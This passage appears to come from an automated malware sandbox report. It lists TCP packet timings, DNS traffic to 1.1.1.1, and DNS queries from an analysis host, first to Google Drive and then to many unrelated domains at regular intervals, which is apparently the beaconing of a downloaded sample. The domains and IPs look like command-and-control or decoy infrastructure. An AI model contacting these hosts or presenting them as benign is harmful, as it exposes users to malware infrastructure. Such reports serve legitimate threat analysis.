                                                                                                                              Dec 4, 2023 15:28:58.362137079 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.362304926 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.362477064 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.362477064 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.362657070 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.544477940 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.544538975 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.544661999 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.544811964 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.544918060 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.544946909 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:58.545007944 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.545073986 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.545227051 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.545512915 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.545555115 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.727438927 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.727504015 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.727596045 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.727893114 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.727952957 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.727998972 CET805023191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:58.728251934 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:28:59.681556940 CET5023180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:00.697159052 CET5023280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:00.879282951 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:00.879511118 CET5023280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:00.879688025 CET5023280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:01.101756096 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.101875067 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.101980925 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.102081060 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.102169037 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.102241039 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.102261066 CET5023280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:01.102318048 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.102397919 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.102435112 CET5023280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:01.102495909 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.102565050 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.102571964 CET5023280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:01.102756977 CET5023280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:01.285810947 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.285892010 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.285953999 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.286010027 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.286067963 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.286128044 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.286134958 CET5023280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:01.286225080 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.286245108 CET5023280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:01.286315918 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.286318064 CET5023280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:01.286398888 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.286452055 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:01.286595106 CET5023280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:01.286900997 CET5023280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:01.286953926 CET5023280192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:29:01.468571901 CET805023291.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:06.518739939 CET5023380192.168.11.2089.117.169.140
                                                                                                                              Dec 4, 2023 15:29:06.684448004 CET805023389.117.169.140192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:06.684703112 CET5023380192.168.11.2089.117.169.140
                                                                                                                              Dec 4, 2023 15:29:06.684861898 CET5023380192.168.11.2089.117.169.140
                                                                                                                              Dec 4, 2023 15:29:06.850414038 CET805023389.117.169.140192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:06.850496054 CET805023389.117.169.140192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:06.850689888 CET805023389.117.169.140192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:06.850848913 CET5023380192.168.11.2089.117.169.140
                                                                                                                              Dec 4, 2023 15:29:06.850914001 CET5023380192.168.11.2089.117.169.140
                                                                                                                              Dec 4, 2023 15:29:07.016488075 CET805023389.117.169.140192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:11.867032051 CET5023480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:29:12.034063101 CET805023454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:12.034465075 CET5023480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:29:12.036173105 CET5023480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:29:12.244683981 CET805023454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:14.015098095 CET805023454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:14.015166998 CET805023454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:14.015611887 CET5023480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:29:14.015613079 CET5023480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:29:14.182702065 CET805023454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:24.145311117 CET5023580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:29:24.269787073 CET805023574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:24.270018101 CET5023580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:29:24.270245075 CET5023580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:29:24.394167900 CET805023574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:24.399466991 CET805023574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:24.400144100 CET805023574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:24.400398970 CET5023580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:29:24.400398970 CET5023580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:29:24.524558067 CET805023574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:34.533422947 CET5023680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:29:34.643265009 CET8050236216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:34.643506050 CET5023680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:29:34.643704891 CET5023680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:29:34.763840914 CET8050236216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:34.763916969 CET8050236216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:34.763979912 CET8050236216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:34.764036894 CET8050236216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:34.764090061 CET8050236216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:34.764132023 CET8050236216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:34.764178038 CET8050236216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:34.764508963 CET5023680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:29:34.764759064 CET5023680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:29:34.874541998 CET8050236216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:39.767460108 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:39.943511963 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:39.943785906 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:39.943886042 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.122477055 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.122555971 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.122617006 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.122673035 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.122726917 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.122775078 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.122782946 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.122838020 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.122961044 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.122961044 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.122994900 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.123054028 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.123111010 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.123219013 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.123388052 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.298896074 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.298981905 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.299046040 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.299108028 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.299201965 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.299232006 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.299299955 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.299384117 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.299494028 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.299562931 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.299720049 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.299751997 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.299781084 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.299886942 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.299943924 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.299969912 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.299999952 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.300056934 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.300096989 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.300112963 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.300168037 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.300223112 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.300261021 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.300327063 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.300331116 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.300384045 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.300438881 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.300528049 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.300589085 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.475128889 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475155115 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475173950 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475193977 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475328922 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475348949 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.475354910 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475385904 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475405931 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475425005 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475444078 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475462914 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475481987 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475500107 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475569963 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.475569963 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.475580931 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475632906 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475652933 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475681067 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.475788116 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.475788116 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.475888968 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475914001 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475933075 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.475951910 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.476008892 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:40.476099014 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.476298094 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.476389885 CET5023780192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:29:40.652173042 CET805023737.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:50.498748064 CET5023880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:29:50.615757942 CET8050238108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:50.615969896 CET5023880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:29:50.616137981 CET5023880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:29:50.733120918 CET8050238108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:50.831990957 CET8050238108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:50.832057953 CET8050238108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:50.832442999 CET5023880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:29:50.832499027 CET5023880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:29:50.949688911 CET8050238108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:55.841434956 CET5023980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:29:56.017421007 CET8050239198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:56.017647982 CET5023980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:29:56.017821074 CET5023980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:29:56.192879915 CET8050239198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:56.339462996 CET8050239198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:56.339561939 CET8050239198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:56.339946985 CET5023980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:29:56.340013981 CET5023980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:29:56.514992952 CET8050239198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:30:02.449196100 CET5024080192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:30:02.618052959 CET8050240198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:30:02.618247032 CET5024080192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:30:02.618408918 CET5024080192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:30:02.784259081 CET8050240198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:30:02.795258045 CET8050240198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:30:02.795301914 CET8050240198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:30:02.795540094 CET5024080192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:30:02.795629978 CET5024080192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:30:02.962137938 CET8050240198.252.98.64192.168.11.20

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 4, 2023 15:22:02.795330048 CET5898153192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:22:02.891237974 CET53589811.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:03.661540031 CET5164253192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:22:03.773056030 CET53516421.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:25.512803078 CET5326953192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:22:25.864830017 CET53532691.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:42.499038935 CET6161253192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:22:42.606797934 CET53616121.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:50.653280973 CET5237253192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:22:50.906050920 CET53523721.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:04.134963036 CET6154653192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:23:04.418781042 CET53615461.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.476742029 CET5503553192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:23:12.617836952 CET53550351.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:25.787261963 CET5364153192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:23:26.232273102 CET53536411.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:40.048662901 CET6098453192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:23:40.278816938 CET53609841.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:53.561395884 CET6243353192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:23:53.684068918 CET53624331.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:07.308311939 CET4975553192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:24:07.425935984 CET53497551.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:20.836652994 CET6302653192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:24:21.048724890 CET53630261.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:34.771238089 CET5382053192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:24:35.205137014 CET53538201.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:48.611982107 CET5200553192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:24:48.728785992 CET53520051.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:02.218214035 CET6534453192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:25:02.392484903 CET53653441.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:16.139022112 CET6483453192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:25:16.318856955 CET53648341.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:29.540832043 CET6210753192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:25:29.763139009 CET53621071.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.506237984 CET5263053192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:25:43.608050108 CET53526301.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:07.064472914 CET5564253192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:26:07.226275921 CET53556421.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:28.480664015 CET5502753192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:26:28.764765978 CET53550271.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:57.804963112 CET6105253192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:27:58.009080887 CET53610521.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:11.551918030 CET5556453192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:28:11.700593948 CET53555641.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:24.814595938 CET5476953192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:28:24.999907017 CET53547691.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:28:38.749006033 CET6145653192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:28:39.103446960 CET53614561.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:06.289911032 CET5025853192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:29:06.518049955 CET53502581.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:19.021372080 CET5563453192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:29:19.132354975 CET53556341.1.1.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:29:29.409790039 CET5564653192.168.11.201.1.1.1
                                                                                                                              Dec 4, 2023 15:29:29.529067039 CET53556461.1.1.1192.168.11.20

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Dec 4, 2023 15:22:02.795330048 CET192.168.11.201.1.1.10xfeStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:22:03.661540031 CET192.168.11.201.1.1.10xddb4Standard query (0)doc-0c-0k-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:22:25.512803078 CET192.168.11.201.1.1.10x8554Standard query (0)www.hormigonesmil.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:22:42.499038935 CET192.168.11.201.1.1.10x157bStandard query (0)www.buben.consultingA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:22:50.653280973 CET192.168.11.201.1.1.10xaa91Standard query (0)www.homesteadmath.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:23:04.134963036 CET192.168.11.201.1.1.10xb762Standard query (0)www.extragrandifirme.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:23:12.476742029 CET192.168.11.201.1.1.10xc050Standard query (0)www.ritualyoga.orgA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:23:25.787261963 CET192.168.11.201.1.1.10x72a9Standard query (0)www.rocsys.netA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:23:40.048662901 CET192.168.11.201.1.1.10x3ae1Standard query (0)www.metodomestredojogo.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:23:53.561395884 CET192.168.11.201.1.1.10x6980Standard query (0)www.echolinkevolve.xyzA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:24:07.308311939 CET192.168.11.201.1.1.10x7d17Standard query (0)www.rtptornado4dnihboss.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:24:20.836652994 CET192.168.11.201.1.1.10xd247Standard query (0)www.slimnthinau.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:24:34.771238089 CET192.168.11.201.1.1.10x932aStandard query (0)www.080869.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:24:48.611982107 CET192.168.11.201.1.1.10x7247Standard query (0)www.eigenheimstattmiete.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:25:02.218214035 CET192.168.11.201.1.1.10x856bStandard query (0)www.neuvillette.orgA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:25:16.139022112 CET192.168.11.201.1.1.10x1d0eStandard query (0)www.scoopstarz.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:25:29.540832043 CET192.168.11.201.1.1.10xd887Standard query (0)www.vaultedjewelry.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:25:43.506237984 CET192.168.11.201.1.1.10xb325Standard query (0)www.brls.moneyA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:26:07.064472914 CET192.168.11.201.1.1.10x285aStandard query (0)www.buben.consultingA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:26:28.480664015 CET192.168.11.201.1.1.10xc9acStandard query (0)www.extragrandifirme.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:27:57.804963112 CET192.168.11.201.1.1.10xf766Standard query (0)www.austintrafficlawyer.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:11.551918030 CET192.168.11.201.1.1.10xe7e9Standard query (0)www.littlehappiez.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:24.814595938 CET192.168.11.201.1.1.10x29c7Standard query (0)www.engindenizyurdu.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:38.749006033 CET192.168.11.201.1.1.10x3048Standard query (0)www.opleverdossier.onlineA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:29:06.289911032 CET192.168.11.201.1.1.10x1ce0Standard query (0)www.fisiocomoterapia.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:29:19.021372080 CET192.168.11.201.1.1.10x547aStandard query (0)www.buben.consultingA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:29:29.409790039 CET192.168.11.201.1.1.10xb510Standard query (0)www.extragrandifirme.comA (IP address)IN (0x0001)false

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
